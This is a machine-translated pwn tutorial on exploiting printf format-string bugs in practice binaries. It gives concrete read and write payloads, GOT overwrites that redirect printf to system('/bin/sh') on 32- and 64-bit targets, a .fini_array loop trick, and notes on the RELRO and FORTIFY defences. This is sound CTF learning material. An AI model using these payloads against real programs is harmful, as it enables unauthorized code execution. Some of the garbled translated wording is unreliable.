Linux PWN Getting Started Tutorial--formatting string vulnerability

Source: Internet
Author: User

This article [email protected]

Originally from: https://bbs.ichunqiu.com/thread-42943-1-1.html

0x00 the vulnerability in printf functions the family of printf functions is a common function family in C programming. In general, we use the form of printf ([formatted string], arguments) to make calls, such as

However, sometimes for the sake of convenience can also be written

In fact, this is a very dangerous notation. Due to a design flaw in the printf function family, an attacker would have the opportunity to read and write any memory address when its first parameter could be controlled.

0x01 using formatted string vulnerability to implement arbitrary address reading first, let's look at a simple example of our own writing ~/format_x86/format_x86

This is a very simple code program, in order to leave the backdoor, I called the system function to write a showversion (). The rest is a wireless loop that reads and writes, and invokes printf () in a problematic way. Normally, what we enter will be output as is.

But when we enter some specific characters, the output changes.

As you can see, when we enter a formatted string that is recognized by printf, printf parses and outputs it as a formatted string. The principle is simple, as the form of printf ("%s", "Hello World") the use of the first parameter%s as a formatted string parameter parsing, here because we directly with printf output a variable, when the variable is also the format of the string, Nature will be parsed by printf. So what's behind the output? Let's go on with the experiment.

We directly under the call _printf Line breakpoint and then start the program in debug mode, and then enter a large string of%x. Output results

The stack situation at this time

It's easy to see that the output is just a series of data that Esp-4 started down. So theoretically we can get stack data in a finite range by overlaying%x. So is it possible for us to disclose other data? We know that there is%s in the formatted string for the output character. It is essentially reading the corresponding parameter and parsing it as a pointer to get the string output to the corresponding address. Let's first enter a%s observation result.

We see the output of%s followed by a newline, the corresponding stack and data are as follows:

The top of the stack is the first parameter, which is the%s we entered, the address of the second parameter is the same as the first parameter, which is either%s and carriage return 0x0a as the address resolution. Since we can manipulate the stack through input at this time, we can enter an address, and then the%s corresponds to this address, so that the output address point to the string, to achieve arbitrary address reading.

By just debugging we can see that our input starts with the sixth parameter (the sixth ' 000a7325 ' =%s\n\x00 from the top of the stack). So we can construct the string "\x01\x80\x04\x08%x.%x.%x.%x.%s". The address in front of here is the Elf file loaded address 08048000+1, why not 08048000 later, interested can experiment with their own.

Since the string contains non-uppercase characters, we have no way to input directly, this time we use Pwntools+ida additional way to debug.

We succeeded in leaking out the contents of the address 0x08048001.

After just testing, the payload that we use to divulge the addresses we specify should still be understandable to the reader. Since our input ontology happens to read the sixth parameter of the parameter in printf, we place the address at the beginning so that it is used by printf as the sixth parameter. Next is the formatted string, using%x to dispose of the second to fifth parameters (our input address is the first parameter), and the sixth parameter as the address resolution using%s. But what if the input length is limited and our input is located outside of the first dozens of parameters of printf? Overlay%x is obviously unrealistic. So we need to use another feature that formats the string.

The formatted string can use a special representation to specify the processing of nth parameters, such as the output fifth parameter can be written as%4$s, sixth is%5$s, need to output nth parameter is% (n-1) $[format control). So our payload can be simplified to "\x01\x80\x04\x08%5$s".

0x02 using formatted string vulnerability arbitrary write although we can use the format string vulnerability to reach arbitrary address read, but we can not directly through the read to exploit the vulnerability getshell, we need to write any address. So we introduce another feature of the formatted string in this SectionTo--write using printf.

printf has a special format control%n, unlike other formatted characters that control the output format and content, this formatted character writes the number of characters that have been output to the memory of the corresponding parameter. We changed the payload to "\x8c\x97\x04\x08%5$n", where 0804978c was the first address of the. BSS segment, and a writable address. The content in this address before execution is 0

After printf executes, the content in this address becomes 4, and the view output discovers that the four characters "\x8c\x97\x04\x08" are output, and the carriage return is not counted.

We re-modified payload as "\x8c\x97\x04\x08%2048c%5$n", successfully changed the contents of 0804978c into 0x804

Now that we have verified the read and write of any address, we can then construct exp to take the shell.

Since we can write at any address and have the system function in the program, we can directly choose to hijack a function's got table entry as the PLT table entry for system, thus executing system ("/bin/sh"). Which one to hijack? We found that there are only four functions in the Got table, and the printf function can be called as a single parameter, and the parameters are exactly what we entered. So we can hijack printf to system and read "/bin/sh" through read again, and printf ("/bin/sh") will become system ("/bin/sh"). According to the previous arbitrary address to write the experiment, we are easy to construct payload as follows:

Printf_got = 0x08049778

SYSTEM_PLT = 0x08048320

Payload = P32 (printf_got) + "%" +str (system_plt-4) + "c%5$n" #p32 (Printf_got) accounted for 4 bytes, so system_plt to subtract 4

Send payload In the past, you can find the got table in this time the printf item has been hijacked

Send "/bin/sh" again at this time to take the shell.

However, there is a problem here, if the reader really debug their own once will find that the call_printf line execution time Extra long, and the last Io.interactive () when the screen cursor will blink for a long time, output a large number of empty characters. Use Io.recvall () to read these characters to discover the amount of data up to 128.28MB. This is because we can output up to 134,513,436 characters in our payload

Since all of our experiments are conducted between the native/virtual machine and Docker, it is not affected by the network environment. In the actual game and exploit environment, it is possible to transfer such a large amount of data at one time, which may cause the network to get stuck or even disconnect. Therefore, we must change the method of writing exp.

We know that there are%lld,%llx in the 64-bit way to represent four-word (qword)-length data, and symmetrically, we can also use%HD,%hhx such a way to represent word (word) and byte (byte) length data, corresponding to%n is%HN,%HHN. To prevent the program from crashing due to the wrong address, we still need to get rid of the printf entries in the Got table at once, so we have to modify four bytes at a time using%HHN. Then we'll have to reconstruct the payload.

First, let's add four bytes to payload to modify.

Then we'll change the first bit. Since both x86 and x86-64 are small-endian, the printf_got corresponds to the address after two bits 0x20

At this time we have modified the data at 0x08049778 for 0x20, and then we need to modify the data at 0x08049778+2 to 0x83. Since we have output 0x20 bytes (16 bytes of address +0x20-16%c), we also need to output 0x83-0x20 bytes

Continue to modify 0x08049778+4, need to be modified to 0x04, however we have already output 0x83 bytes, so we need to output to 0x04+0x100=0x104 bytes, truncated to become 0x04

Modify 0x08049778+6

Final payload for [C] Plain text view copy code

' \X78\X97\X04\X08\X79\X97\X04\X08\X7A\X97\X04\X08\X7B\X97\X04\X08%16C%5$HHN%99C%6$HHN%129C%7$HHN%4C%8$HHN '

Of course, for the format string Payload,pwntools also provides a direct use of the class FMTSTR, specific documents see http://docs.pwntools.com/en/stable/fmtstr.html, our more commonly used function is

。 The first parameter, offset, is the first controllable stack offset (without formatting string arguments), and substituting our example is the sixth argument, so it is 5. The second dictionary can be understood by the name, Numbwritten refers to the data that printf outputs before formatting the string, such as printf ("Hello [var]"), at which time the "Hello" has been output before the controllable variable for a total of six characters, the parameter value should be set to 6. The fourth choice is in%HHN (byte),%hn (word), or%n (DWORD). In our case, we can write a

The script for this example shell is seen in the attachment, which is not mentioned here.

format string Vulnerability under 0X03 64 bit the exploit of the format string exploits in the end of the 32 bit, we continue to see the 64-bit programs that have now become mainstream. We open the example ~/format_x86-64/format_x86-64.

In fact, this program and the example used in the previous section are the same code file, but compiled into a 64-bit form. As in the previous example, we first look at the controllable stack address offset.

According to the previous example, our input is at the top of the stack, so it is the first parameter and the offset should be 0. But the problem is, should the stack top not be a string address? Don't forget that the 64-bit sequence is RDI, RSI, RDX, RCX, R8, R9, then the stack, so the offset should be 6. We can use a bunch of%llx to prove it.

With offsets, the system in the printf and PLT tables in the Got table can also be obtained directly from the program, and we can use Fmtstr_payload to generate the payload.

However, we will find that this payload cannot modify the system of the printf entry in the Got table as the PLT

However, look at the memory, found payload and no problem

So what's the problem? Let's take a look at the output of printf

You can see that the first time we entered the payload is only a space (\x20), \x10 and ' (\x60) three characters. What is this for?

We looked back at payload, and it was easy to see that \x00 followed by the \x20\x10\x60 three characters, and \x00 was the string end symbol, which is why we chose 0x08048001 instead of 0x08048000 test read in the previous section. Since the 64-bit user-visible memory address high is all with \x00 (64-bit address a total of 16 16 binary), so using the method of constructing payload is obviously not feasible, so we need to adjust the payload, put the address to the end of payload.

Because the address has \x00, so this can not be written in%HHN segment, so our payload structure is as follows

The payload seems to be fine, but if you take the test, you'll see that the program crashes immediately after reading the output with Io.recvall ().

What is this for? If you look closely at the bottom right corner of the stack, you will find that the constructed address is misplaced.

So we also need to adjust the payload so that the data in front of the address is exactly a multiple of the address length. Of course, the address offset also has to be adjusted. The result of the adjustment is as follows:

This time it will be all right.

0x04 using a formatted string vulnerability causes a program to loop indefinitely from the two examples above, we can see that the successful use of formatted string vulnerability Getshell, often due to the existence of loops in the program. What if there are no loops in the program? Before we tried using ROP technology to hijack the function return address to start, this time we will use the format string vulnerability to do this.

We open the example ~/mma CTF 2nd 2016-greeting/greeting

Similarly, the got table in this 32-bit program has system (see left), and there is a format string vulnerability. The steps to calculate the offset value and construct the payload in detail are not described here. The main problem with this program is that we need to use printf to trigger the vulnerability, but we can see from the code that the functions in the other got tables are no longer invoked after printf executes, which means that the system cannot be executed even if the successful triggering of the vulnerability hijacking got table. At this point we need to find a way to let the program cycle again.

As we mentioned in the previous article, although we use the main function as the entry for the program when we write the code, the entry is not the main function but the start code snippet when compiling the program. In fact, the start code snippet also calls __libc_start_main to do some initialization work, and finally calls the main function and does some processing after the main function finishes. The process is seen in the link http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html

Roughly as

Simply put, the. Init segment code and each function pointer in the function array of the. Init_array segment are called before the main function. Similarly, the main function ends with a call to the. Fini segment code and each function pointer in the. Fini._arrary segment of the function array.

And our goal is to modify. The first element of the Fini_array array is start. It is important to note that the contents of this array are modified once again from start, and the number of bytes that the program can read is limited, so you need to modify two addresses at once and adjust the payload appropriately. The available scripts are also seen in attachments.

0x05 some vulnerability mitigation mechanisms related to formatting string vulnerabilities in the Checksec script check, we mentioned the role of NX before, this section we describe the other two and Linux PWN of formatting string vulnerabilities commonly used means of mitigating mechanisms relro and fortify

First, let's introduce RELRO,RELRO is the abbreviation for the relocation table read only (relocation read only). The relocation table is the got table and the PLT table in the elf file that we often refer to. The sources and roles of these two tables are described in detail in the article introducing Ret2dl-resolve. Now the first thing we need to know is that these two tables, as their name, are functions and variables outside the program (functions and variables that are not defined and implemented in the program, such as read. Obviously you have to call the read function in your own code without having to write the relocation of a read function to prepare it. Because relocation requires additional performance overhead, for optimization reasons, the program generally uses lazy loading, that is, the memory address of the external function is found on the first call (for example, the Read function, which is the first time the program executes call read) and is filled into the Got table. Therefore, the got table must be writable. But the got table can also be written to the format of the vulnerability of the string has a very convenient way to use, that is, modify the Got table. As mentioned in the previous article, we can modify a function's got table entry (such as puts) as the address of the system function by using the vulnerability, so that we do call puts actually invoke the system, corresponding to the parameters passed to the system, The System ("/bin/sh") can then be executed. You can do this by using CHECKSEC to check the results such as

Its RELRO item is PARTIALRELRO.

The Relro:full Relro, shown in the beginning of the diagram, means that the program's relocation table entries are all read-only, either. Got or. GOT.PLT cannot be modified. We found this program (in the "Stack Canary and bypass thinking" exercise), in the call read up and down breakpoints, modify the first parameter buf to got table address to try to modify the got table, the program will not error, but the data is not modified, the read function returned a-1

Obviously, the behavior of attempting to hijack a got table through a vulnerability is blocked after the program has turned on full RELRO protection, including formatting string vulnerabilities.

Next we introduce another rare protection measure, fortify, a source-level protection mechanism implemented by GCC, whose function is to check the source code at compile time to avoid potential buffer overflow errors. Simply put, after adding this protection (compile-time with parameter-d_fortify_source=2) some sensitive functions such as read, fgets,memcpy, printf, and so on, can cause the vulnerability of the function will be replaced by __read_chk,__fgets_ CHK, __memcpy_chk, __printf_chk and so on. These chk functions check that the read/copy byte length exceeds the buffer length by checking whether a string position such as%n is located in a writable address that might be modified by the user, avoiding the possibility of a format string skipping over certain parameters, such as direct%7$x, to avoid a vulnerability. Programs that turn on fortify protection are checked out by checksec, and the existence of the CHK function is also found when you view the got table directly during disassembly

You can click on the link to download after-school exercises Oh >>>> https://bbs.ichunqiu.com/thread-42943-1-1.html

Linux PWN Getting Started Tutorial--formatting string vulnerability

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.